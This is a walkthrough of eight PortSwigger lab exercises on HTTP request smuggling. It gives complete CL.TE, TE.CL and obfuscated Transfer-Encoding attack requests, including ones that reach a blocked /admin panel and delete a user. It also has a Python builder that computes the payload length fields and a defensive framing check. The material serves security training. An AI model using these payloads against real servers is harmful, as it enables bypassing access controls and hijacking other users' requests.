HTTP Request Smuggling
What is HTTP Request Smuggling?
HTTP Request Smuggling is a vulnerability in the way a chain of HTTP servers (typically a front-end proxy, load balancer or WAF in front of a back-end application server) decides where one request ends and the next begins. When the two servers frame the same byte stream differently, an attacker can append data that the front-end treats as the tail of a harmless request but the back-end treats as the beginning of a new one. The smuggled request never passes through the front-end's security checks, so it can bypass mechanisms such as a WAF or path-based access restrictions, and because it lands on a back-end connection shared with other users it can also hijack or poison their requests and expose sensitive data.
Logic Of Operation
The attacker hides a second HTTP request in the body of a POST request to the target. HTTP/1.1 offers two ways to state the length of a body: the Content-Length header and Transfer-Encoding: chunked. RFC 7230 says that when both are present Transfer-Encoding takes precedence and Content-Length must be ignored, but not every server follows this, and some do not support chunked encoding at all. If the front-end uses Content-Length and the back-end uses Transfer-Encoding (CL.TE), or the other way round (TE.CL), the two disagree on where the first request stops, and the back-end parses the remainder of the body as the start of a second request. Because the second request travels inside the body of the first, the WAF or front-end does not inspect it as a request and does not block it. Two preconditions matter in practice: the front-end must reuse the same back-end connection for several requests (otherwise the leftover bytes are simply discarded when the connection closes), and the effect only becomes visible on the next request sent down that connection, which is why every lab below follows the attack request with a second, ordinary request.
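The disagreement described above, shown as an added example that is not part of the original write-up: a small Python script parses one constructed byte stream twice, once the way a server that trusts Content-Length would (the front-end in a CL.TE pair) and once the way a server that trusts Transfer-Encoding would (the back-end). The stream is the first lab's payload (a zero chunk, a blank line and the letter G, with Content-Length 6) followed by an ordinary request; the host name lab.example is a placeholder.

```python
# Added example for this write-up (not code from the PortSwigger labs): feed one byte
# stream to a Content-Length parser and to a chunked parser and compare how each
# splits it into requests. The stream is constructed here from the page's first lab
# payload ("0", blank line, "G", Content-Length 6) followed by an ordinary request;
# the host name is a placeholder.


def split_head(stream):
    """Split off the request line and headers; return (head, remainder)."""
    idx = stream.find(b"\r\n\r\n")
    if idx == -1:
        raise ValueError("incomplete request head")
    return stream[:idx], stream[idx + 4:]


def parse_head(head):
    """Return (request_line, {lower-case name: value}) for one request head."""
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].decode("latin-1"), headers


def read_body_content_length(remainder, headers):
    """Body is exactly Content-Length bytes (0 if the header is absent)."""
    n = int(headers.get(b"content-length", b"0"))
    return remainder[:n], remainder[n:]


def read_body_chunked(remainder):
    """Body is a series of <hex-size>CRLF<data>CRLF chunks ending with a zero chunk."""
    body = b""
    while True:
        eol = remainder.find(b"\r\n")
        if eol == -1:
            raise ValueError("incomplete chunk-size line")
        size = int(remainder[:eol].split(b";")[0], 16)   # ignore chunk extensions
        remainder = remainder[eol + 2:]
        if size == 0:
            # no trailers in these payloads, so only the final CRLF remains
            return body, remainder[2:]
        body += remainder[:size]
        remainder = remainder[size + 2:]                 # data plus its delimiting CRLF


def split_requests(stream, framing):
    """Parse the stream as a server using the given framing rule would.

    framing "cl": always trust Content-Length (the front-end in a CL.TE pair).
    framing "te": use chunked when Transfer-Encoding says so (the back-end).
    Returns the request lines in the order that server would process them.
    """
    request_lines = []
    while stream:
        head, remainder = split_head(stream)
        request_line, headers = parse_head(head)
        te = headers.get(b"transfer-encoding", b"").lower()
        if framing == "te" and b"chunked" in te:
            _, stream = read_body_chunked(remainder)
        else:
            _, stream = read_body_content_length(remainder, headers)
        request_lines.append(request_line)
    return request_lines


# Constructed stream: the lab-1 CL.TE prefix immediately followed by an innocent request.
ATTACK_PREFIX = (
    b"POST / HTTP/1.1\r\n"
    b"Host: lab.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"G"
)
NEXT_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: lab.example\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
STREAM = ATTACK_PREFIX + NEXT_REQUEST


def front_end_view():
    return split_requests(STREAM, "cl")


def back_end_view():
    return split_requests(STREAM, "te")


if __name__ == "__main__":
    print("front-end (Content-Length):", front_end_view())
    print("back-end (chunked):        ", back_end_view())
```

The front-end sees two POST / requests and forwards both as they are. The back-end sees the first request end at the zero chunk and then a request whose method is GPOST, which is exactly the error message the first two labs below produce.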
PortSwigger Web Academy Examples
1. HTTP request smuggling, basic CL.TE vulnerability
To exploit the HTTP Request Smuggling vulnerability hosted by this web application, we first capture a request to the home page of the application and send it to Burp Suite's Repeater.
GET / HTTP/1.1
Host: ac3e1f701e637e778012e6e6007500c5.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac3e1f701e637e778012e6e6007500c5.web-security-academy.net/post/comment/confirmation?postId=2
Connection: close
Cookie: session=QroHeEwCKAozHYTLXrEWz40PF4vTC9eU
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
We then change the method to POST and add the two body-length headers: a Content-Length that covers the whole body, and Transfer-Encoding: chunked. The body is a zero-length chunk (the digit 0 followed by a blank line) and the single letter G. Content-Length must equal the exact number of bytes after the blank line that ends the headers, where every line ending counts as two bytes (CRLF) and any trailing blank lines left in the editor count as well; in Repeater, turn off the Update Content-Length option so Burp does not rewrite the value we set.
POST / HTTP/1.1
Host: ac3e1f701e637e778012e6e6007500c5.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac3e1f701e637e778012e6e6007500c5.web-security-academy.net/post/comment/confirmation?postId=2
Connection: close
Cookie: session=QroHeEwCKAozHYTLXrEWz40PF4vTC9eU
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Transfer-Encoding: chunked
0
G
We send this request to the target server and then issue a normal request, either from the browser or by sending the original GET again from Repeater. The front-end trusts Content-Length and forwards the whole body. The back-end honours Transfer-Encoding, stops at the zero-length chunk and leaves the trailing G unread on the connection. Our follow-up request therefore arrives at the back-end as GPOST / HTTP/1.1, and the application answers that the method GPOST is not recognised. This response confirms the CL.TE desync. If the follow-up request is served normally, the front-end may have used a different back-end connection, so send the pair again.
HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Connection: close
Keep-Alive: timeout=0
Content-Length: 33
"Unrecognized method GPOST"
2. HTTP request smuggling, basic TE.CL vulnerability
As in the first lab, we start from a request to the home page captured in Burp Suite's Repeater.
GET / HTTP/1.1
Host: aca91f811e7be3cb8078376000d5005a.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Origin: https://aca91f811e7be3cb8078376000d5005a.web-security-academy.net
Connection: close
Referer: https://aca91f811e7be3cb8078376000d5005a.web-security-academy.net/post?postId=2
Cookie: session=NUJOItmchuwSnGGmesoLylI5MXrQRGTh
Upgrade-Insecure-Requests: 1
We now turn it into a TE.CL attack. Content-Length is set to 4, which is exactly the chunk-size line 5c plus its CRLF, so the back-end (which uses Content-Length) ends our request there and treats everything that follows as a new request. The front-end (which uses Transfer-Encoding) reads a 0x5c = 92-byte chunk containing the smuggled GPOST request, then the terminating zero chunk, and forwards all of it. The chunk size counts only the chunk data, from the G of GPOST up to and including x=1; the CRLF after x=1 is the chunk delimiter and is not counted.
POST / HTTP/1.1
Host: aca91f811e7be3cb8078376000d5005a.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Origin: https://aca91f811e7be3cb8078376000d5005a.web-security-academy.net
Connection: close
Referer: https://aca91f811e7be3cb8078376000d5005a.web-security-academy.net/post?postId=2
Cookie: session=NUJOItmchuwSnGGmesoLylI5MXrQRGTh
Upgrade-Insecure-Requests: 1
Transfer-Encoding: Chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
After sending this request, we make another request from the browser or Repeater. The back-end parses the chunk data as a GPOST request and rejects it, and because the smuggled Content-Length: 15 is larger than the smuggled body, the first bytes of our follow-up request are consumed as the rest of that body. The follow-up request therefore receives the 403 for the unrecognised GPOST method, which confirms the TE.CL desync.
HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Connection: close
Keep-Alive: timeout=0
Content-Length: 33
"Unrecognized method GPOST"
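For the two payload shapes used in labs 1 and 2 (and again in labs 4 to 7), the length fields are what decide whether the attack works: Content-Length must count every byte of the body including the CRLF line endings, and the chunk-size line must be the hex length of the chunk data alone. The following Python, an added example that is not code from this page or from PortSwigger, builds both request shapes and computes those values. The smuggled requests are the ones from labs 2 and 7 above and the host name lab.example is a placeholder.

```python
# Added example for this write-up (not lab code): build the CL.TE and TE.CL attack
# requests used on this page with the length fields computed rather than counted by
# hand. Host name is a placeholder; the smuggled requests are copied from the labs
# above.

CRLF = "\r\n"


def wire(lines):
    """Join lines with CRLF. Every byte here counts toward Content-Length and chunk sizes."""
    return CRLF.join(lines)


def chunk_size_hex(chunk_data):
    """Hex length of the chunk data only; the CRLF after the data is a delimiter, not data."""
    return format(len(chunk_data.encode("latin-1")), "x")


def cl_te_request(host, smuggled):
    """Front-end trusts Content-Length, back-end trusts Transfer-Encoding.

    Body = zero chunk + smuggled bytes. Content-Length covers the whole body, so the
    front-end forwards all of it; the back-end stops at the zero chunk and leaves the
    smuggled bytes on the connection, where they become the start of the next request.
    """
    body = "0" + CRLF + CRLF + smuggled
    head = wire([
        "POST / HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode('latin-1'))}",
        "Transfer-Encoding: chunked",
        "",
        "",
    ])
    return head + body


def te_cl_request(host, smuggled):
    """Front-end trusts Transfer-Encoding, back-end trusts Content-Length.

    The smuggled request is one chunk followed by the zero chunk, so the front-end
    forwards everything. Content-Length covers only the chunk-size line (e.g. "5c" +
    CRLF = 4), so the back-end ends the first request there and parses the chunk data
    as a new request.
    """
    size_line = chunk_size_hex(smuggled)
    body = wire([size_line, smuggled, "0", "", ""])
    head = wire([
        "POST / HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(size_line) + len(CRLF)}",
        "Transfer-Encoding: chunked",
        "",
        "",
    ])
    return head + body


# Smuggled requests taken from the labs above (lab 2 and lab 7).
GPOST_SMUGGLED = wire([
    "GPOST / HTTP/1.1",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: 15",
    "",
    "x=1",
])
ADMIN_SMUGGLED = wire([
    "POST /admin HTTP/1.1",
    "Host: localhost",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: 15",
    "",
    "x=1",
])

if __name__ == "__main__":
    print(cl_te_request("lab.example", "G").encode("latin-1"))
    print(te_cl_request("lab.example", GPOST_SMUGGLED).encode("latin-1"))
    print("chunk sizes:", chunk_size_hex(GPOST_SMUGGLED), chunk_size_hex(ADMIN_SMUGGLED))
```

The computed values match the ones typed by hand in the labs: 5c for the GPOST request, 71 for the POST /admin request, and Content-Length 4 for a two-digit chunk-size line. When pasting the output into Repeater, disable the Update Content-Length option so Burp does not overwrite the header.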
3. HTTP request smuggling, obfuscating the TE header
In this lab both the front-end and the back-end support chunked encoding, so the plain CL.TE and TE.CL payloads fail. One of the servers can still be made to ignore the header by obfuscating it: we send two Transfer-Encoding headers, a valid chunked one and an invalid one (enf). The front-end processes the chunked encoding; the back-end, seeing a transfer coding it does not recognise, falls back to Content-Length, which recreates the TE.CL situation of the previous lab. Starting again from a request to the home page, we modify it as follows.
POST / HTTP/1.1
Host: acde1f6c1e950b2b81a6d79c00720095.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
Connection: close
Cookie: session=L3RViYphCl3EbNVNvMjzGmPfoD1ifAp7
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-Encoding: chunked
Transfer-Encoding: enf
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
We send the modified request to the target server and, after receiving the response, make another request through the browser or Repeater and examine the server's response.
HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Connection: close
Keep-Alive: timeout=0
Content-Length: 27
"Unrecognized method GPOST"
By obfuscating one of the headers we have recreated a TE.CL desync on a pair of servers that both nominally support chunked encoding. Any difference in how the two servers parse the header (case, surrounding whitespace, duplicate headers, unknown codings) can be exploited in the same way.
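Lab 3 works because the two servers disagree about which Transfer-Encoding header counts. The usual defence is to refuse any request whose framing is ambiguous before it reaches the back-end. The Python below is an added example, not code from this page or from any real proxy, of such a check over the raw header block. The header blocks it tests are constructed here: the chunked/enf pair mirrors lab 3, and the others are common Transfer-Encoding obfuscations (space before the colon, unknown coding, bare LF, leading whitespace, header name split from its colon).

```python
# Added example for this write-up (not from the labs or from any real proxy): a strict
# framing check that a front-end could run on the raw header block before forwarding,
# rejecting exactly the ambiguities the CL.TE, TE.CL and obfuscated-TE payloads above
# rely on. The header blocks used in the demo are constructed for this example; the
# "Transfer-Encoding: enf" variant mirrors lab 3.
import re

# RFC 7230 token characters: a header name may contain nothing else (no spaces, no CR/LF).
TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def check_framing(raw_head):
    """Decide whether a request head has unambiguous body framing.

    raw_head: request line plus header lines joined by CRLF, without the final blank line.
    Returns (accepted, reason).
    """
    lines = raw_head.split("\r\n")
    te_values, cl_values = [], []
    for line in lines[1:]:
        if "\r" in line or "\n" in line:
            return False, "bare CR or LF inside a header line"
        if line[:1] in (" ", "\t"):
            return False, "obsolete line folding"
        name, sep, value = line.partition(":")
        if not sep or not TOKEN.match(name):
            # e.g. "Transfer-Encoding : chunked" or a name split from its colon
            return False, f"malformed header name {name!r}"
        lname = name.lower()
        if lname == "transfer-encoding":
            te_values.append(value.strip(" \t"))
        elif lname == "content-length":
            cl_values.append(value.strip(" \t"))
    if te_values and cl_values:
        # RFC 7230 says TE wins, but the safe choice for a proxy is to refuse the request
        return False, "both Transfer-Encoding and Content-Length present"
    if len(te_values) > 1:
        return False, "multiple Transfer-Encoding headers"
    if te_values and te_values[0].lower() != "chunked":
        return False, f"unsupported transfer coding {te_values[0]!r}"
    if len(set(cl_values)) > 1:
        return False, "conflicting Content-Length values"
    if cl_values and not cl_values[0].isdigit():
        return False, "non-numeric Content-Length"
    return True, "ok"


# Constructed request heads for the demo.
LAB3_HEAD = "\r\n".join([
    "POST / HTTP/1.1",
    "Host: lab.example",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: 3",
    "Transfer-Encoding: chunked",
    "Transfer-Encoding: enf",
])
CLEAN_HEAD = "\r\n".join([
    "POST / HTTP/1.1",
    "Host: lab.example",
    "Content-Length: 3",
])
OBFUSCATED_HEADS = [
    "POST / HTTP/1.1\r\nTransfer-Encoding : chunked",          # space before the colon
    "POST / HTTP/1.1\r\nTransfer-Encoding: xchunked",          # unknown coding
    "POST / HTTP/1.1\r\nX: X\nTransfer-Encoding: chunked",     # bare LF hides a header
    "POST / HTTP/1.1\r\n Transfer-Encoding: chunked",          # leading space (obs-fold)
    "POST / HTTP/1.1\r\nTransfer-Encoding\r\n: chunked",       # name split from its colon
]


def demo():
    """Return the verdicts for the constructed heads."""
    return {
        "lab3": check_framing(LAB3_HEAD),
        "clean": check_framing(CLEAN_HEAD),
        "obfuscated": [check_framing(h) for h in OBFUSCATED_HEADS],
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

Rejecting rather than normalising is deliberate: once a request with two framing headers has been accepted, any normalisation the front-end performs has to match the back-end's parsing exactly, and lab 3 shows how small the differences can be. Speaking HTTP/2 between front-end and back-end, where message boundaries are defined by the frame layer, or not reusing back-end connections at all, removes this class of problem entirely.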
4. HTTP request smuggling, confirming a CL.TE vulnerability via differential responses
In this lab we must make the target return a 404 through the smuggling vulnerability. The point of a differential response is that our follow-up request is for a page that exists, so a 404 can only come from the smuggled request having altered it. The body is a zero-length chunk followed by GET /deneme HTTP/1.1 and an X-Ignore header with no line ending after it. The back-end leaves these bytes on the connection; when the next request arrives, its request line is appended to the unfinished header (X-Ignore: XGET / HTTP/1.1), and the back-end processes GET /deneme instead. After bringing the home-page request into Repeater, we edit and send it as follows.
POST / HTTP/1.1
Host: acbe1ffb1e81eecc80db22d5009500a0.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-cl-te-via-differential-responses
Connection: keep-alive
Cookie: session=5ap6p1xgeuGNoLZCycK0vq63F9INfij6
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Transfer-Encoding: chunked
0
GET /deneme HTTP/1.1
X-Ignore: X
After the server responds, we send an ordinary request from the browser or Repeater and receive a 404 Not Found for a page that exists. The follow-up request was rewritten by our smuggled prefix, which confirms the CL.TE vulnerability.
HTTP/1.1 404 Not Found
Content-Type: application/json; charset=utf-8
Keep-Alive: timeout=0
Connection: close
Content-Length: 11
"Not Found"
5. HTTP request smuggling, confirming a TE.CL vulnerability via differential responses
This lab asks for the same 404 proof, this time for TE.CL. The smuggled request is POST /404 sent as a single chunk of 0x5e bytes, and Content-Length: 4 again covers only the chunk-size line. The smuggled request's own Content-Length: 15 is deliberately larger than its body (x=1 plus the zero chunk), so the back-end completes it with the first bytes of the next request, which is then answered with the 404. After bringing the home-page request into Repeater, we edit and send it as follows.
POST / HTTP/1.1
Host: ac901f291eefaabc80bc381500a2003f.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac901f291eefaabc80bc381500a2003f.web-security-academy.net/post?postId=5
Connection: keep-alive
Cookie: session=ElYbHK7HbpNx2b950onRnFjdrHAtBlK9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
After the server responds, we send an ordinary request from the browser or Repeater and receive a 404 Not Found. Our follow-up request was swallowed by the smuggled POST /404, which confirms the TE.CL vulnerability.
HTTP/1.1 404 Not Found
Content-Type: application/json; charset=utf-8
Keep-Alive: timeout=0
Connection: close
Content-Length: 11
"Not Found"
6. Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability
In this lab we must reach the restricted path /admin on the target and delete the user carlos. The front-end blocks every request for /admin, and the back-end additionally serves it only when the Host header is localhost. A smuggled request is never inspected by the front-end, so we can both reach the path and supply Host: localhost ourselves. As before, we capture a request to the home page and edit it. The smuggled request carries its own Content-Length: 10 with a body of only x=, so that the first bytes of the following request are absorbed as the rest of that body instead of being processed separately.
POST / HTTP/1.1
Host: ac6e1f421e14946b80423a5100040063.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te
Connection: close
Cookie: session=h44DdwM9xiAVPXpagtdwkzLB10uF3f88
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
We send the edited request twice; the second response is the back-end's answer to the smuggled request.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=hWNPTKeHssnAkXwa9OpGcT1Avtbo1oku; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 2920
<!DOCTYPE html>
<html>
…
<section class="top-links">
<a href="/login">Account login</a><p>|</p>
<a href="/admin">Admin panel</a><p>|</p>
</section>
</header>
<section>
<h1>Users</h1>
<div>
<span>administrator - </span>
<a href="/admin/delete?username=administrator">Delete</a>
</div>
<div>
<span>carlos - </span>
<a href="/admin/delete?username=carlos">Delete</a>
</div>
<div>
<span>wiener - </span>
<a href="/admin/delete?username=wiener">Delete</a>
</div>
</section>
…
</html>
The response shows the admin panel of the target application. Now we edit the smuggled request to delete the user carlos.
POST / HTTP/1.1
Host: ac6e1f421e14946b80423a5100040063.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te
Connection: close
Cookie: session=h44DdwM9xiAVPXpagtdwkzLB10uF3f88
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
We send the edited request twice and examine the second response.
HTTP/1.1 302 Found
Location: /admin
Set-Cookie: session=rERq7HRNGdDcqLlC7h8Rex52DXIrzXZS; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 0
The server redirects us to the admin panel, which is its normal response to a successful delete. To confirm that the deletion was processed, we load the home page of the application and see the lab marked as solved.
…
<span>LAB</span>
<p>Solved</p>
<span class="lab-status-icon"></span>
</div>
</div>
</section>
<section id="notification-labsolved" class="notification-labsolved-hidden">
<div class="container">
<h4>Congratulations, you solved the lab!</h4>
<div>
…
7. Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability
In this lab we do the same as in the previous one, but with a TE.CL payload, so the request is edited differently: the smuggled POST /admin request becomes a single chunk of 0x71 bytes, and Content-Length: 4 covers only the chunk-size line. Let's take the home-page request to Repeater and make our edits.
POST / HTTP/1.1
Host: ac9e1ff41e6eada480b84e4b0010008f.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-te-cl
Connection: keep-alive
Cookie: session=AzVQGCT6z5guaraBzDFSfuDuNEpHFH8x
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
We send the edited request twice and examine the response to the second send.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=l0Jh8b3STFLvNAADu3c2Agm0roc0uuOp; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 2920
<!DOCTYPE html>
<html>
…
<section class="top-links">
<a href="/login">Account login</a><p>|</p>
<a href="/admin">Admin panel</a><p>|</p>
</section>
</header>
<section>
<h1>Users</h1>
<div>
<span>administrator - </span>
<a href="/admin/delete?username=administrator">Delete</a>
</div>
<div>
<span>carlos - </span>
<a href="/admin/delete?username=carlos">Delete</a>
</div>
<div>
<span>wiener - </span>
<a href="/admin/delete?username=wiener">Delete</a>
</div>
</section>
…
</html>
As the HTTP response shows, we have access to the admin panel. Now we edit the smuggled request again to delete the user carlos; the chunk size grows to 0x87 because the request line is longer.
POST / HTTP/1.1
Host: ac9e1ff41e6eada480b84e4b0010008f.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-te-cl
Connection: keep-alive
Cookie: session=AzVQGCT6z5guaraBzDFSfuDuNEpHFH8x
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
After sending the edited request twice, we examine the second response from the server.
HTTP/1.1 302 Found
Location: /admin
Set-Cookie: session=tULgK1910cLLaxtepLGdHBV5m2BMNT7P; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 0
As in the previous lab, the server redirected us to the admin panel. To confirm that the deletion was processed, we load the home page of the application and see the lab marked as solved.
…
<span>LAB</span>
<p>Solved</p>
<span class="lab-status-icon"></span>
</div>
</div>
</section>
<section id="notification-labsolved" class="notification-labsolved-hidden">
<div class="container">
<h4>Congratulations, you solved the lab!</h4>
<div>
…
8. Exploiting HTTP request smuggling to reveal front-end request rewriting
In this lab the back-end again only serves /admin to requests that appear to come from localhost, but it decides this from a header that the front-end adds to every request when it rewrites it (typically the client's IP address), and we do not know the header's name. We can make the back-end show us the rewritten request: we smuggle a POST to the search function whose Content-Length is larger than its actual body, so that the headers of the next request, as rewritten by the front-end, are appended to the search parameter and reflected in the results page. We capture a search request from the home page and edit it in Repeater.
POST / HTTP/1.1
Host: acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
Connection: close
Referer: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net/
Cookie: session=B6FJ4MUlNcOi2sqBm2MGDmewPk8sWkFp
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close
search=test
We send the edited request twice and examine the second response.
…
<section class="blog-header">
<h1>0 search results for 'test
POST / HTTP/1.1
X-yOldbL-Ip: 31.140.186.119
Host: acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/2'</h1>
<hr>
</section>
…
The search results echo the start of the rewritten request, including the X-yOldbL-Ip: header that the front-end added with our IP address. The back-end trusts this header for its localhost check, and because the smuggled request is never seen or rewritten by the front-end, we can set the header to 127.0.0.1 ourselves. We edit the smuggled request accordingly.
POST / HTTP/1.1
Host: acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
Origin: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
Connection: close
Referer: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net/
Cookie: session=B6FJ4MUlNcOi2sqBm2MGDmewPk8sWkFp
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
X-yOldbL-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close
x=1
We send the request twice and verify that the second response is the admin panel.
